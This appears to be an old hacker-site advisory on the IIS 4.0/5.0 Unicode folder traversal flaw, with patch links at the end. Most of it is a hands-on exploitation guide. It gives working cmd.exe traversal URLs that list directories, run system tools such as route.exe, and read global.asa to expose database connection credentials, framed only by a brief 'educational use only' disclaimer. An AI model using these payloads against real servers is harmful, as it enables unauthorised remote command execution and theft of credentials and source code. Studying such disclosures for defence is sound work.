Products Affected: Internet Information Services (IIS) 4.0 & 5.0
OS: Windows NT, Windows 2000
Description:
Run commands remotely on IIS
This article describes the "Web Server Folder Traversal"
security vulnerability in Internet Information Server (IIS).
Advisory:
By simply passing a URL to a machine that is exploitable
you can run any command directly on the remote machine.
Remember this is for EDUCATIONAL USE ONLY and should only be
run on your own machine.
For example:
First you can list all the files in a directory by using
this: (replace localhost with the domain name of the server)
http://localhost/scripts/..%c1%9c../winnt/system32/cmd.exe?/C+dir+C:
You can list the contents of any directory on the system by changing
the "C:" to any other directory, for example c:\inetpub
Now, for more advanced users, you can run other commands by using:
http://localhost/scripts/..%c1%9c../winnt/system32/route.exe?PRINT
This example will print a copy of the routing table
directly to your browser. You can run any exe that writes its
output to the console in this way, such as netstat, ipconfig, tftp, etc.
Now let's say you find something interesting on the machine's
hard drive - for example, if someone is a crappy ASP
programmer they will use the global.asa to hold all the
database connection info. Now if you're curious enough and
you're familiar with IIS you know where to find this - I'm
not going to hold your hand.
To view files of interest you would simply use this URL:
http://localhost/scripts/..%c1%9c../winnt/system32/cmd.exe?/C+type+C:\inetpub\wwwroot\directory\global.asa
This will 'type' the file's contents to your browser - in
other words you can view all the source code instead of
executing it on the server.
Fix:
Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862
Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/Security/Bulletin/ms00-078.asp
Credits:
rOOtless@astalavista.com -> Core Member